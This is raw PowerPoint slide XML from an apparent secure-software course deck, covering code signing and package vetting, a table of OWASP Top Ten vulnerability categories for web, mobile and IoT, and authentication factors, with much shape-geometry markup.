              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1F588E6D-758C-436D-8726-0849F257BFC0}"/>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7"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195" y="5193201"/>
            <a:ext cx="590438" cy="59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1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EBDC1-F3DB-4E4A-97A2-2A2F1C5F7291}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Application and Data Integrity</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{82099159-0EB2-4703-8CF1-DE35B489ABC7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="341924" y="1307130"/>
            <a:ext cx="8460152" cy="5093670"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Users often download software from the web or from an app store.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>An attacker cloud slip malware into an installer the user thought was safe.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Use absolute paths when importing modules into your code to reduce risk of using malicious versions.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Be careful to vet all packages that you download.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Code signing uses an encrypted digital certificate attached to the code.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Ensures integrity and authenticity.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Signing certificate:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Can be self-signed (generate your own, for free).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Typically used for development and testing.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Can be purchased from a certifying authority (CA).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Provides a higher level of trust than self-signed.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>CA-issued certificate should be kept as secure as possible.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Limit access to it.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Slide Number Placeholder 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{630AF768-1C03-4D36-93BD-785B8AAFA105}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{A8160BDD-7155-D744-B749-9730458604AD}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>4</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="578719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61600-ED40-4FC8-B84F-E6BFD149C5F5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{A8160BDD-7155-D744-B749-9730458604AD}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>40</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20969EBA-CD48-4280-9236-5FAF05DFB254}"/>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1D9DBB8D-1556-42EF-8D6C-06B1CBC79B9C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="14"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Prevent Platform Vulnerabilities</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="108120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28CC69-57BD-41F7-9544-9AD8D1CCDF34}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{A8160BDD-7155-D744-B749-9730458604AD}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>41</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A813D800-00A2-446D-B47D-A505C2CCD974}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>OWASP Top Ten Platform Vulnerabilities</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="5" name="Group 23"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="228600" y="1143000"/>
          <a:ext cx="8725584" cy="4815840"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="2908528">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="2908528">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2274069417"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="2908528">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kern="1200" cap="none" normalizeH="0" baseline="0" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Calibri"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Calibri"/>
                        </a:rPr>
                        <a:t>Web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normalizeH="0" baseline="0" noProof="0" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Calibri"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Calibri"/>
                        </a:rPr>
                        <a:t>Mobile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normalizeH="0" baseline="0" noProof="0" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Calibri"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Calibri"/>
                        </a:rPr>
                        <a:t>Internet of Things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10000"/>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Injection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Improper Platform Usage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Web Interface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Broken Authentication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Data Storage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Insufficient Authentication/ Authorization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95691150"/>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Sensitive Data Exposure</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Communication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Network Services</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83249711"/>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XML External Entities (XXE)</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Authentication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Lack of Transport Encryption/ Integrity Verification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8266999"/>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Broken Access Control</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Insufficient Cryptography</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Privacy Concerns</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62538655"/>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Security Misconfiguration</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Authorization</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Cloud Interface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72439547"/>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Cross-Site Scripting (XSS)</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Client Code Quality</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Mobile Interface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32802184"/>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Insecure Deserialization</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Code Tampering</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Insufficient Security Configurability</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79614846"/>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Using Components with Known Vulnerabilities</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Reverse Engineering</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Insecure Software/Firmware</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32646666"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="381000">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mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Calibri"/>
                        </a:rPr>
                        <a:t>Insufficient Logging &amp; Monitoring</a:t>
                      </a:r>
                      <a:endParaRPr kumimoji="0" lang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" normalizeH="0" baseline="0" dirty="0">
                        <a:ln>
                          <a:noFill/>
                        </a:ln>
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="Calibri"/>
                        <a:ea typeface="+mn-ea"/>
                        <a:cs typeface="Calibri"/>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Extraneous Functionality</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Poor Physical Security</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29156578"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="545665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7048500" y="1743075"/>
            <a:ext cx="2096319" cy="2235092"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{52826AB6-5ACC-472D-88C2-075B1BDB84B5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Many web vulnerabilities are caused by improper </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>authentication and authorization.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Authentication</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Essentially determines whether user has access </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>to application’s "front door"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>User:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Might be a human being</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Might be a software process</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Approaches to authentication:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Something you know (username, password/passphrase/PIN)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Least secure</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Something you have (token, smart card, mobile device)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Something you are (biometrics)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Somewhere you are (geolocation)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Used in conjunction with other methods.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Single factor – using only one method</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Prefer to use two- or multi-factor authentication</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{057D2BCD-501E-4B02-BAD0-2022633410C7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Authentication</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Slide Number Placeholder 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3116E134-9374-400A-8CB3-064CA143BBDA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{A8160BDD-7155-D744-B749-9730458604AD}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>42</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Freeform: Shape 16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="558235">
            <a:off x="7382448" y="1510035"/>
            <a:ext cx="828352" cy="438166"/>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904568"/>
              <a:gd name="connsiteY0" fmla="*/ 27693 h 578299"/>
              <a:gd name="connsiteX1" fmla="*/ 645445 w 904568"/>
              <a:gd name="connsiteY1" fmla="*/ 87309 h 578299"/>
              <a:gd name="connsiteX2" fmla="*/ 904568 w 904568"/>
              <a:gd name="connsiteY2" fmla="*/ 578299 h 578299"/>
              <a:gd name="connsiteX3" fmla="*/ 904568 w 904568"/>
              <a:gd name="connsiteY3" fmla="*/ 578299 h 578299"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 904568"/>
              <a:gd name="connsiteY0" fmla="*/ 37705 h 588311"/>
              <a:gd name="connsiteX1" fmla="*/ 645445 w 904568"/>
              <a:gd name="connsiteY1" fmla="*/ 97321 h 588311"/>
              <a:gd name="connsiteX2" fmla="*/ 904568 w 904568"/>
              <a:gd name="connsiteY2" fmla="*/ 588311 h 588311"/>
              <a:gd name="connsiteX3" fmla="*/ 904568 w 904568"/>
              <a:gd name="connsiteY3" fmla="*/ 588311 h 588311"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 904568"/>
              <a:gd name="connsiteY0" fmla="*/ 37229 h 587835"/>
              <a:gd name="connsiteX1" fmla="*/ 712913 w 904568"/>
              <a:gd name="connsiteY1" fmla="*/ 98031 h 587835"/>
              <a:gd name="connsiteX2" fmla="*/ 904568 w 904568"/>
              <a:gd name="connsiteY2" fmla="*/ 587835 h 587835"/>
              <a:gd name="connsiteX3" fmla="*/ 904568 w 904568"/>
              <a:gd name="connsiteY3" fmla="*/ 587835 h 587835"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 1023068"/>
              <a:gd name="connsiteY0" fmla="*/ 37229 h 630910"/>
              <a:gd name="connsiteX1" fmla="*/ 712913 w 1023068"/>
              <a:gd name="connsiteY1" fmla="*/ 98031 h 630910"/>
              <a:gd name="connsiteX2" fmla="*/ 904568 w 1023068"/>
              <a:gd name="connsiteY2" fmla="*/ 587835 h 630910"/>
              <a:gd name="connsiteX3" fmla="*/ 1023068 w 1023068"/>
              <a:gd name="connsiteY3" fmla="*/ 611574 h 630910"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 1113433"/>
              <a:gd name="connsiteY0" fmla="*/ 20150 h 594495"/>
              <a:gd name="connsiteX1" fmla="*/ 712913 w 1113433"/>
              <a:gd name="connsiteY1" fmla="*/ 80952 h 594495"/>
              <a:gd name="connsiteX2" fmla="*/ 1103645 w 1113433"/>
              <a:gd name="connsiteY2" fmla="*/ 362390 h 594495"/>
              <a:gd name="connsiteX3" fmla="*/ 1023068 w 1113433"/>
              <a:gd name="connsiteY3" fmla="*/ 594495 h 594495"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 1023068"/>
              <a:gd name="connsiteY0" fmla="*/ 28338 h 602683"/>
              <a:gd name="connsiteX1" fmla="*/ 712913 w 1023068"/>
              <a:gd name="connsiteY1" fmla="*/ 89140 h 602683"/>
              <a:gd name="connsiteX2" fmla="*/ 1023068 w 1023068"/>
              <a:gd name="connsiteY2" fmla="*/ 602683 h 602683"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 1081569"/>
              <a:gd name="connsiteY0" fmla="*/ 22376 h 438166"/>
              <a:gd name="connsiteX1" fmla="*/ 712913 w 1081569"/>
              <a:gd name="connsiteY1" fmla="*/ 83178 h 438166"/>
              <a:gd name="connsiteX2" fmla="*/ 1081570 w 1081569"/>
              <a:gd name="connsiteY2" fmla="*/ 438166 h 438166"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="0">
                <a:pos x="connsiteX0" y="connsiteY0"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="connsiteX1" y="connsiteY1"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="connsiteX2" y="connsiteY2"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1081569" h="438166">
                <a:moveTo>
                  <a:pt x="0" y="22376"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="258916" y="-28425"/>
                  <a:pt x="532651" y="13880"/>
                  <a:pt x="712913" y="83178"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="893175" y="152476"/>
                  <a:pt x="1016955" y="331178"/>
                  <a:pt x="1081570" y="438166"/>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1" name="Freeform: Shape 20"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="558235">
            <a:off x="7363984" y="1508292"/>
            <a:ext cx="1526083" cy="641568"/>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680072"/>
              <a:gd name="connsiteY0" fmla="*/ 60648 h 627318"/>
              <a:gd name="connsiteX1" fmla="*/ 668594 w 1680072"/>
              <a:gd name="connsiteY1" fmla="*/ 50815 h 627318"/>
              <a:gd name="connsiteX2" fmla="*/ 904568 w 1680072"/>
              <a:gd name="connsiteY2" fmla="*/ 611254 h 627318"/>
              <a:gd name="connsiteX3" fmla="*/ 1680072 w 1680072"/>
              <a:gd name="connsiteY3" fmla="*/ 460783 h 627318"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 1992588"/>
              <a:gd name="connsiteY0" fmla="*/ 60648 h 671908"/>
              <a:gd name="connsiteX1" fmla="*/ 668594 w 1992588"/>
              <a:gd name="connsiteY1" fmla="*/ 50815 h 671908"/>
              <a:gd name="connsiteX2" fmla="*/ 904568 w 1992588"/>
              <a:gd name="connsiteY2" fmla="*/ 611254 h 671908"/>
              <a:gd name="connsiteX3" fmla="*/ 1992588 w 1992588"/>
              <a:gd name="connsiteY3" fmla="*/ 622829 h 671908"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 1992588"/>
              <a:gd name="connsiteY0" fmla="*/ 27986 h 593945"/>
              <a:gd name="connsiteX1" fmla="*/ 668594 w 1992588"/>
              <a:gd name="connsiteY1" fmla="*/ 18153 h 593945"/>
              <a:gd name="connsiteX2" fmla="*/ 1367556 w 1992588"/>
              <a:gd name="connsiteY2" fmla="*/ 80880 h 593945"/>
              <a:gd name="connsiteX3" fmla="*/ 1992588 w 1992588"/>
              <a:gd name="connsiteY3" fmla="*/ 590167 h 593945"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 1992588"/>
              <a:gd name="connsiteY0" fmla="*/ 61480 h 623661"/>
              <a:gd name="connsiteX1" fmla="*/ 668594 w 1992588"/>
              <a:gd name="connsiteY1" fmla="*/ 51647 h 623661"/>
              <a:gd name="connsiteX2" fmla="*/ 1992588 w 1992588"/>
              <a:gd name="connsiteY2" fmla="*/ 623661 h 623661"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 1992588"/>
              <a:gd name="connsiteY0" fmla="*/ 29192 h 591373"/>
              <a:gd name="connsiteX1" fmla="*/ 668594 w 1992588"/>
              <a:gd name="connsiteY1" fmla="*/ 19359 h 591373"/>
              <a:gd name="connsiteX2" fmla="*/ 1992588 w 1992588"/>
              <a:gd name="connsiteY2" fmla="*/ 591373 h 591373"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 1992588"/>
              <a:gd name="connsiteY0" fmla="*/ 60040 h 622221"/>
              <a:gd name="connsiteX1" fmla="*/ 691744 w 1992588"/>
              <a:gd name="connsiteY1" fmla="*/ 3908 h 622221"/>
              <a:gd name="connsiteX2" fmla="*/ 1992588 w 1992588"/>
              <a:gd name="connsiteY2" fmla="*/ 622221 h 622221"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 1992588"/>
              <a:gd name="connsiteY0" fmla="*/ 81596 h 643777"/>
              <a:gd name="connsiteX1" fmla="*/ 668594 w 1992588"/>
              <a:gd name="connsiteY1" fmla="*/ 2315 h 643777"/>
              <a:gd name="connsiteX2" fmla="*/ 1992588 w 1992588"/>
              <a:gd name="connsiteY2" fmla="*/ 643777 h 643777"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 1992588"/>
              <a:gd name="connsiteY0" fmla="*/ 81737 h 643918"/>
              <a:gd name="connsiteX1" fmla="*/ 668594 w 1992588"/>
              <a:gd name="connsiteY1" fmla="*/ 2456 h 643918"/>
              <a:gd name="connsiteX2" fmla="*/ 1992588 w 1992588"/>
              <a:gd name="connsiteY2" fmla="*/ 643918 h 643918"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 1992588"/>
              <a:gd name="connsiteY0" fmla="*/ 79387 h 641568"/>
              <a:gd name="connsiteX1" fmla="*/ 668594 w 1992588"/>
              <a:gd name="connsiteY1" fmla="*/ 106 h 641568"/>
              <a:gd name="connsiteX2" fmla="*/ 1992588 w 1992588"/>
              <a:gd name="connsiteY2" fmla="*/ 641568 h 641568"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 1992588"/>
              <a:gd name="connsiteY0" fmla="*/ 79387 h 641568"/>
              <a:gd name="connsiteX1" fmla="*/ 668594 w 1992588"/>
              <a:gd name="connsiteY1" fmla="*/ 106 h 641568"/>
              <a:gd name="connsiteX2" fmla="*/ 1992588 w 1992588"/>
              <a:gd name="connsiteY2" fmla="*/ 641568 h 641568"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="0">
                <a:pos x="connsiteX0" y="connsiteY0"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="connsiteX1" y="connsiteY1"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="connsiteX2" y="connsiteY2"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1992588" h="641568">
                <a:moveTo>
                  <a:pt x="0" y="79387"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="115159" y="63514"/>
                  <a:pt x="180938" y="8781"/>
                  <a:pt x="668594" y="106"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1156250" y="-8569"/>
                  <a:pt x="1716756" y="522399"/>
                  <a:pt x="1992588" y="641568"/>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2" name="Freeform: Shape 21"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="913060" flipV="1">
            <a:off x="7126195" y="2629059"/>
            <a:ext cx="871664" cy="418137"/>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101338"/>
              <a:gd name="connsiteY0" fmla="*/ 94381 h 593568"/>
              <a:gd name="connsiteX1" fmla="*/ 865364 w 1101338"/>
              <a:gd name="connsiteY1" fmla="*/ 33129 h 593568"/>
              <a:gd name="connsiteX2" fmla="*/ 1101338 w 1101338"/>
              <a:gd name="connsiteY2" fmla="*/ 593568 h 593568"/>
              <a:gd name="connsiteX3" fmla="*/ 1101338 w 1101338"/>
              <a:gd name="connsiteY3" fmla="*/ 593568 h 593568"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 696224"/>
              <a:gd name="connsiteY0" fmla="*/ 213160 h 570943"/>
              <a:gd name="connsiteX1" fmla="*/ 460250 w 696224"/>
              <a:gd name="connsiteY1" fmla="*/ 10504 h 570943"/>
              <a:gd name="connsiteX2" fmla="*/ 696224 w 696224"/>
              <a:gd name="connsiteY2" fmla="*/ 570943 h 570943"/>
              <a:gd name="connsiteX3" fmla="*/ 696224 w 696224"/>
              <a:gd name="connsiteY3" fmla="*/ 570943 h 570943"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 696224"/>
              <a:gd name="connsiteY0" fmla="*/ 84120 h 441903"/>
              <a:gd name="connsiteX1" fmla="*/ 564423 w 696224"/>
              <a:gd name="connsiteY1" fmla="*/ 22868 h 441903"/>
